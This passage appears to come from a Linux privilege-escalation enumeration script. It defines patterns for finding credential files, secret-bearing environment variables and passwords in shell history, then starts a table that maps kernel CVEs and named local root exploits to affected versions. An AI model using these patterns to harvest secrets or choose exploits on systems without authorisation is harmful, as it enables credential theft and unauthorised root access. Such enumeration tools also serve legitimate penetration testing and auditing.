INT_HIDDEN_FILES=".Xauthority|.asc|.bashrc|.bluemix|.boto|.cer|.claude|.claude.json|.cloudflared|.codex|.credentials.json|.crt|.csr|.cursor|.db|.der|.docker|.env|.erlang.cookie|.flyrc|.ftpconfig|.gemini|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.keytab|.kube|.ldaprc|.lesshst|.maintenance|.mcp.json|.mozilla|.msmtprc|.mylogin.cnf|.ovpn|.p12|.password-store|.pcap|.pcapng|.pem|.pfx|.pgp|.pgpass|.plan|.profile|.psk|.pub|.pypirc|.rdg|.recently-used.xbel|.rhosts|.roadtools_auth|.secrets.mkey|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.tf|.tfstate|.timer|.vault-token|.vhd|.vhdx|.viminfo|.vmdk|.vnc|.wgetrc" 1162 1163 shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/prl-opengl-switcher.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh" 1164 1165 pwd_inside_history="az login|enable_autologin|7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|roadrecon auth|root|snyk|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|Save-AzContext|xfreerdp|^ssh|steghide|@|KEY=|TOKEN=|BEARER=|Authorization:|chpasswd" 1166 1167 knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|mmyangfl@gmail.com|rogershimizu@gmail.com|thmarques@gmail.com" 1168 1169 pwd_inside_history="az login|enable_autologin|7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|roadrecon auth|root|snyk|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|Save-AzContext|xfreerdp|^ssh|steghide|@|KEY=|TOKEN=|BEARER=|Authorization:|chpasswd" 1170 1171 pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID" 1172 pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID" 1173 pwd_in_variables3="CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION" 1174 pwd_in_variables4="CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|DATABASE_PASSWORD|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId" 1175 pwd_in_variables5="eureka.awsSecretKey|ExcludeRestorePackageImports|EXPORT_SPACE_ID|FIREBASE_API_JSON|FIREBASE_API_TOKEN|FIREBASE_KEY|FIREBASE_PROJECT|FIREBASE_PROJECT_DEVELOP|FIREBASE_PROJECT_ID|FIREBASE_SERVICE_ACCOUNT|FIREBASE_TOKEN|FIREFOX_CLIENT|FIREFOX_ISSUER|FIREFOX_SECRET|FLASK_SECRET_KEY|FLICKR_API_KEY|FLICKR_API_SECRET|FOSSA_API_KEY|ftp_host|FTP_LOGIN|FTP_PW|FTP_USER|GCLOUD_BUCKET|GCLOUD_PROJECT|GCLOUD_SERVICE_KEY|GCS_BUCKET|GHB_TOKEN|GHOST_API_KEY|GH_API_KEY|GH_EMAIL|GH_NAME|GH_NEXT_OAUTH_CLIENT_ID|GH_NEXT_OAUTH_CLIENT_SECRET|GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID|GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET|GH_OAUTH_CLIENT_ID|GH_OAUTH_CLIENT_SECRET|GH_OAUTH_TOKEN|GH_REPO_TOKEN|GH_TOKEN|GH_UNSTABLE_OAUTH_CLIENT_ID|GH_UNSTABLE_OAUTH_CLIENT_SECRET|GH_USER_EMAIL|GH_USER_NAME|GITHUB_ACCESS_TOKEN|GITHUB_API_KEY|GITHUB_API_TOKEN|GITHUB_AUTH|GITHUB_AUTH_TOKEN|GITHUB_AUTH_USER|GITHUB_CLIENT_ID|GITHUB_CLIENT_SECRET|GITHUB_DEPLOYMENT_TOKEN|GITHUB_DEPLOY_HB_DOC_PASS|GITHUB_HUNTER_TOKEN|GITHUB_KEY|GITHUB_OAUTH|GITHUB_OAUTH_TOKEN|GITHUB_RELEASE_TOKEN|GITHUB_REPO|GITHUB_TOKEN|GITHUB_TOKENS|GITHUB_USER|GITLAB_USER_EMAIL|GITLAB_USER_LOGIN|GIT_AUTHOR_EMAIL|GIT_AUTHOR_NAME|GIT_COMMITTER_EMAIL|GIT_COMMITTER_NAME|GIT_EMAIL|GIT_NAME|GIT_TOKEN|GIT_USER" 1176 pwd_in_variables6="GOOGLE_CLIENT_EMAIL|GOOGLE_CLIENT_ID|GOOGLE_CLIENT_SECRET|GOOGLE_MAPS_API_KEY|GOOGLE_PRIVATE_KEY|gpg.passphrase|GPG_EMAIL|GPG_ENCRYPTION|GPG_EXECUTABLE|GPG_KEYNAME|GPG_KEY_NAME|GPG_NAME|GPG_OWNERTRUST|GPG_PASSPHRASE|GPG_PRIVATE_KEY|GPG_SECRET_KEYS|gradle.publish.key|gradle.publish.secret|GRADLE_SIGNING_KEY_ID|GREN_GITHUB_TOKEN|GRGIT_USER|HAB_AUTH_TOKEN|HAB_KEY|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|HEROKU_API_KEY|HEROKU_API_USER|HEROKU_EMAIL|HEROKU_TOKEN|HOCKEYAPP_TOKEN|INTEGRATION_TEST_API_KEY|INTEGRATION_TEST_APPID|INTERNAL-SECRETS|IOS_DOCS_DEPLOY_TOKEN|IRC_NOTIFICATION_CHANNEL|JDBC:MYSQL|jdbc_databaseurl|jdbc_host|jdbc_user|JWT_SECRET|KAFKA_ADMIN_URL|KAFKA_INSTANCE_NAME|KAFKA_REST_URL|KEYSTORE_PASS|KOVAN_PRIVATE_KEY|LEANPLUM_APP_ID|LEANPLUM_KEY|LICENSES_HASH|LICENSES_HASH_TWO|LIGHTHOUSE_API_KEY|LINKEDIN_CLIENT_ID|LINKEDIN_CLIENT_SECRET|LINODE_INSTANCE_ID|LINODE_VOLUME_ID|LINUX_SIGNING_KEY|LL_API_SHORTNAME|LL_PUBLISH_URL|LL_SHARED_KEY|LOOKER_TEST_RUNNER_CLIENT_ID|LOOKER_TEST_RUNNER_CLIENT_SECRET|LOOKER_TEST_RUNNER_ENDPOINT|LOTTIE_HAPPO_API_KEY|LOTTIE_HAPPO_SECRET_KEY|LOTTIE_S3_API_KEY|LOTTIE_S3_SECRET_KEY|mailchimp_api_key|MAILCHIMP_KEY|mailchimp_list_id|mailchimp_user|MAILER_HOST|MAILER_TRANSPORT|MAILER_USER" 1177 pwd_in_variables7="MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KEY|MAILGUN_PUB_APIKEY|MAILGUN_PUB_KEY|MAILGUN_SECRET_API_KEY|MAILGUN_TESTDOMAIN|ManagementAPIAccessToken|MANAGEMENT_TOKEN|MANAGE_KEY|MANAGE_SECRET|MANDRILL_API_KEY|MANIFEST_APP_TOKEN|MANIFEST_APP_URL|MapboxAccessToken|MAPBOX_ACCESS_TOKEN|MAPBOX_API_TOKEN|MAPBOX_AWS_ACCESS_KEY_ID|MAPBOX_AWS_SECRET_ACCESS_KEY|MG_API_KEY|MG_DOMAIN|MG_EMAIL_ADDR|MG_EMAIL_TO|MG_PUBLIC_API_KEY|MG_SPEND_MONEY|MG_URL|MH_APIKEY|MILE_ZERO_KEY|MINIO_ACCESS_KEY|MINIO_SECRET_KEY|MYSQLMASTERUSER|MYSQLSECRET|MYSQL_DATABASE|MYSQL_HOSTNAMEMYSQL_USER|MY_SECRET_ENV|NETLIFY_API_KEY|NETLIFY_SITE_ID|NEW_RELIC_BETA_TOKEN|NGROK_AUTH_TOKEN|NGROK_TOKEN|node_pre_gyp_accessKeyId|NODE_PRE_GYP_GITHUB_TOKEN|node_pre_gyp_secretAccessKey|NPM_API_KEY|NPM_API_TOKEN|NPM_AUTH_TOKEN|NPM_EMAIL|NPM_SECRET_KEY|NPM_TOKEN|NUGET_APIKEY|NUGET_API_KEY|NUGET_KEY|NUMBERS_SERVICE|NUMBERS_SERVICE_PASS|NUMBERS_SERVICE_USER|OAUTH_TOKEN|OBJECT_STORAGE_PROJECT_ID|OBJECT_STORAGE_USER_ID|OBJECT_STORE_BUCKET|OBJECT_STORE_CREDS|OCTEST_SERVER_BASE_URL|OCTEST_SERVER_BASE_URL_2|OC_PASS|OFTA_KEY|OFTA_SECRET|OKTA_CLIENT_TOKEN|OKTA_DOMAIN|OKTA_OAUTH2_CLIENTID|OKTA_OAUTH2_CLIENTSECRET|OKTA_OAUTH2_CLIENT_ID|OKTA_OAUTH2_CLIENT_SECRET" 1178 pwd_in_variables8="OKTA_OAUTH2_ISSUER|OMISE_KEY|OMISE_PKEY|OMISE_PUBKEY|OMISE_SKEY|ONESIGNAL_API_KEY|ONESIGNAL_USER_AUTH_KEY|OPENWHISK_KEY|OPEN_WHISK_KEY|OSSRH_PASS|OSSRH_SECRET|OSSRH_USER|OS_AUTH_URL|OS_PROJECT_NAME|OS_TENANT_ID|OS_TENANT_NAME|PAGERDUTY_APIKEY|PAGERDUTY_ESCALATION_POLICY_ID|PAGERDUTY_FROM_USER|PAGERDUTY_PRIORITY_ID|PAGERDUTY_SERVICE_ID|PANTHEON_SITE|PARSE_APP_ID|PARSE_JS_KEY|PAYPAL_CLIENT_ID|PAYPAL_CLIENT_SECRET|PERCY_TOKEN|PERSONAL_KEY|PERSONAL_SECRET|PG_DATABASE|PG_HOST|PLACES_APIKEY|PLACES_API_KEY|PLACES_APPID|PLACES_APPLICATION_ID|PLOTLY_APIKEY|POSTGRESQL_DB|POSTGRESQL_PASS|POSTGRES_ENV_POSTGRES_DB|POSTGRES_ENV_POSTGRES_USER|POSTGRES_PORT|PREBUILD_AUTH|PROD.ACCESS.KEY.ID|PROD.SECRET.KEY|PROD_BASE_URL_RUNSCOPE|PROJECT_CONFIG|PUBLISH_KEY|PUBLISH_SECRET|PUSHOVER_TOKEN|PUSHOVER_USER|PYPI_PASSOWRD|QUIP_TOKEN|RABBITMQ_SERVER_ADDR|REDISCLOUD_URL|REDIS_STUNNEL_URLS|REFRESH_TOKEN|RELEASE_GH_TOKEN|RELEASE_TOKEN|remoteUserToShareTravis|REPORTING_WEBDAV_URL|REPORTING_WEBDAV_USER|repoToken|REST_API_KEY|RINKEBY_PRIVATE_KEY|ROPSTEN_PRIVATE_KEY|route53_access_key_id|RTD_KEY_PASS|RTD_STORE_PASS|RUBYGEMS_AUTH_TOKEN|s3_access_key|S3_ACCESS_KEY_ID|S3_BUCKET_NAME_APP_LOGS|S3_BUCKET_NAME_ASSETS|S3_KEY" 1179 pwd_in_variables9="S3_KEY_APP_LOGS|S3_KEY_ASSETS|S3_PHOTO_BUCKET|S3_SECRET_APP_LOGS|S3_SECRET_ASSETS|S3_SECRET_KEY|S3_USER_ID|S3_USER_SECRET|SACLOUD_ACCESS_TOKEN|SACLOUD_ACCESS_TOKEN_SECRET|SACLOUD_API|SALESFORCE_BULK_TEST_SECURITY_TOKEN|SANDBOX_ACCESS_TOKEN|SANDBOX_AWS_ACCESS_KEY_ID|SANDBOX_AWS_SECRET_ACCESS_KEY|SANDBOX_LOCATION_ID|SAUCE_ACCESS_KEY|SECRETACCESSKEY|SECRETKEY|SECRET_0|SECRET_10|SECRET_11|SECRET_1|SECRET_2|SECRET_3|SECRET_4|SECRET_5|SECRET_6|SECRET_7|SECRET_8|SECRET_9|SECRET_KEY_BASE|SEGMENT_API_KEY|SELION_SELENIUM_SAUCELAB_GRID_CONFIG_FILE|SELION_SELENIUM_USE_SAUCELAB_GRID|SENDGRID|SENDGRID_API_KEY|SENDGRID_FROM_ADDRESS|SENDGRID_KEY|SENDGRID_USER|SENDWITHUS_KEY|SENTRY_AUTH_TOKEN|SERVICE_ACCOUNT_SECRET|SES_ACCESS_KEY|SES_SECRET_KEY|setDstAccessKey|setDstSecretKey|setSecretKey|SIGNING_KEY|SIGNING_KEY_SECRET|SIGNING_KEY_SID|SNOOWRAP_CLIENT_SECRET|SNOOWRAP_REDIRECT_URI|SNOOWRAP_REFRESH_TOKEN|SNOOWRAP_USER_AGENT|SNYK_API_TOKEN|SNYK_ORG_ID|SNYK_TOKEN|SOCRATA_APP_TOKEN|SOCRATA_USER|SONAR_ORGANIZATION_KEY|SONAR_PROJECT_KEY|SONAR_TOKEN|SONATYPE_GPG_KEY_NAME|SONATYPE_GPG_PASSPHRASE|SONATYPE_PASSSONATYPE_TOKEN_USER|SONATYPE_USER|SOUNDCLOUD_CLIENT_ID|SOUNDCLOUD_CLIENT_SECRET|SPACES_ACCESS_KEY_ID|SPACES_SECRET_ACCESS_KEY" 1180 pwd_in_variables10="SPA_CLIENT_ID|SPOTIFY_API_ACCESS_TOKEN|SPOTIFY_API_CLIENT_ID|SPOTIFY_API_CLIENT_SECRET|sqsAccessKey|sqsSecretKey|SRCCLR_API_TOKEN|SSHPASS|SSMTP_CONFIG|STARSHIP_ACCOUNT_SID|STARSHIP_AUTH_TOKEN|STAR_TEST_AWS_ACCESS_KEY_ID|STAR_TEST_BUCKET|STAR_TEST_LOCATION|STAR_TEST_SECRET_ACCESS_KEY|STORMPATH_API_KEY_ID|STORMPATH_API_KEY_SECRET|STRIPE_PRIVATE|STRIPE_PUBLIC|STRIP_PUBLISHABLE_KEY|STRIP_SECRET_KEY|SURGE_LOGIN|SURGE_TOKEN|SVN_PASS|SVN_USER|TESCO_API_KEY|THERA_OSS_ACCESS_ID|THERA_OSS_ACCESS_KEY|TRAVIS_ACCESS_TOKEN|TRAVIS_API_TOKEN|TRAVIS_COM_TOKEN|TRAVIS_E2E_TOKEN|TRAVIS_GH_TOKEN|TRAVIS_PULL_REQUEST|TRAVIS_SECURE_ENV_VARS|TRAVIS_TOKEN|TREX_CLIENT_ORGURL|TREX_CLIENT_TOKEN|TREX_OKTA_CLIENT_ORGURL|TREX_OKTA_CLIENT_TOKEN|TWILIO_ACCOUNT_ID|TWILIO_ACCOUNT_SID|TWILIO_API_KEY|TWILIO_API_SECRET|TWILIO_CHAT_ACCOUNT_API_SERVICE|TWILIO_CONFIGURATION_SID|TWILIO_SID|TWILIO_TOKEN|TWITTEROAUTHACCESSSECRET|TWITTEROAUTHACCESSTOKEN|TWITTER_CONSUMER_KEY|TWITTER_CONSUMER_SECRET|UNITY_SERIAL|URBAN_KEY|URBAN_MASTER_SECRET|URBAN_SECRET|userTravis|USER_ASSETS_ACCESS_KEY_ID|USER_ASSETS_SECRET_ACCESS_KEY|VAULT_APPROLE_SECRET_ID|VAULT_PATH|VIP_GITHUB_BUILD_REPO_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY|VIP_GITHUB_DEPLOY_KEY_PASS" 1181 pwd_in_variables11="VIRUSTOTAL_APIKEY|VISUAL_RECOGNITION_API_KEY|V_SFDC_CLIENT_ID|V_SFDC_CLIENT_SECRET|WAKATIME_API_KEY|WAKATIME_PROJECT|WATSON_CLIENT|WATSON_CONVERSATION_WORKSPACE|WATSON_DEVICE|WATSON_DEVICE_TOPIC|WATSON_TEAM_ID|WATSON_TOPIC|WIDGET_BASIC_USER_2|WIDGET_BASIC_USER_3|WIDGET_BASIC_USER_4|WIDGET_BASIC_USER_5|WIDGET_FB_USER|WIDGET_FB_USER_2|WIDGET_FB_USER_3|WIDGET_TEST_SERVERWORDPRESS_DB_USER|WORKSPACE_ID|WPJM_PHPUNIT_GOOGLE_GEOCODE_API_KEY|WPT_DB_HOST|WPT_DB_NAME|WPT_DB_USER|WPT_PREPARE_DIR|WPT_REPORT_API_KEY|WPT_SSH_CONNECT|WPT_SSH_PRIVATE_KEY_BASE64|YANGSHUN_GH_TOKEN|YT_ACCOUNT_CHANNEL_ID|YT_ACCOUNT_CLIENT_ID|YT_ACCOUNT_CLIENT_SECRET|YT_ACCOUNT_REFRESH_TOKEN|YT_API_KEY|YT_CLIENT_ID|YT_CLIENT_SECRET|YT_PARTNER_CHANNEL_ID|YT_PARTNER_CLIENT_ID|YT_PARTNER_CLIENT_SECRET|YT_PARTNER_ID|YT_PARTNER_REFRESH_TOKEN|YT_SERVER_API_KEY|ZHULIANG_GH_TOKEN|ZOPIM_ACCOUNT_KEY|USERNAME|PASSWORD|PASSWD|CREDENTIALS?" 1182 1183 NoEnvVars="LESS_TERMCAP|JOURNAL_STREAM|XDG_SESSION|DBUS_SESSION|systemd\/sessions|systemd_exec|MEMORY_PRESSURE_WATCH|RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_|^PATH=|^INVOCATION_ID=|^WATCHDOG_PID=|^LISTEN_PID=" 1184 1185 EnvVarsRed="[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME|[aA][pP][iI][_][kK][eE][yY]|[aA][wW][sS]|[aA][zZ][uU][rR][eE]|[gG][cC][pP]|[aA][pP][iI]|[sS][eE][cC][rR][eE][tT]|[sS][qQ][lL]|[dD][aA][tT][aA][bB][aA][sS][eE]|[tT][oO][kK][eE][nN]" 1186 1187 commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$" 1188 1189 commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes" 1190 1191 # Contributor: Arjay Saguisa 1192 # Max 25 rows per env variable to avoid hitting env variable size limits. 1193 KERNEL_CVE_DATA_1="$(cat <<'EOF_DATA_1' 1194 CVE-2004-1235 elflbl pkg=linux-kernel,ver=2.4.29 1 1195 CVE-2004-1235 uselib() pkg=linux-kernel,ver=2.4.29 1 Known to work only for 2.4 series (even though 2.6 is also vulnerable) 1196 CVE-2004-1235 krad3 pkg=linux-kernel,ver>=2.6.5,ver<=2.6.11 1 1197 CVE-2004-0077 mremap_pte pkg=linux-kernel,ver>=2.6.0,ver<=2.6.2 1 1198 CVE-2006-2451 raptor_prctl pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17 1 1199 CVE-2006-2451 prctl pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17 1 1200 CVE-2006-2451 prctl2 pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17 1 1201 CVE-2006-2451 prctl3 pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17 1 1202 CVE-2006-2451 prctl4 pkg=linux-kernel,ver>=2.6.13,ver<=2.6.17 1 1203 CVE-2006-3626 h00lyshit pkg=linux-kernel,ver>=2.6.8,ver<=2.6.16 1 1204 CVE-2008-0600 vmsplice1 pkg=linux-kernel,ver>=2.6.17,ver<=2.6.24 1 1205 CVE-2008-0600 vmsplice2 pkg=linux-kernel,ver>=2.6.23,ver<=2.6.24 1 1206 CVE-2008-4210 ftrex pkg=linux-kernel,ver>=2.6.11,ver<=2.6.22 1 world-writable sgid directory and shell that does not drop sgid privs upon exec (ash/sash) are required 1207 CVE-2008-4210 exit_notify pkg=linux-kernel,ver>=2.6.25,ver<=2.6.29 1 1208 CVE-2009-2692 sock_sendpage (simple version) pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30 ubuntu=7.10,RHEL=4,fedora=4|5|6|7|8|9|10|11 1 Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 1209 CVE-2009-2692,CVE-2009-1895 sock_sendpage pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30 ubuntu=9.04 1 /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed 1210 CVE-2009-2692,CVE-2009-1895 sock_sendpage2 pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30 1 Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 1211 CVE-2009-2692,CVE-2009-1895 sock_sendpage3 pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30 1 /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed 1212 CVE-2009-2692,CVE-2009-1895 sock_sendpage (ppc) pkg=linux-kernel,ver>=2.6.0,ver<=2.6.30 ubuntu=8.10,RHEL=4|5 1 /proc/sys/vm/mmap_min_addr needs to equal 0 1213 CVE-2009-2698 the rebel (udp_sendmsg) pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19 debian=4 1 /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed 1214 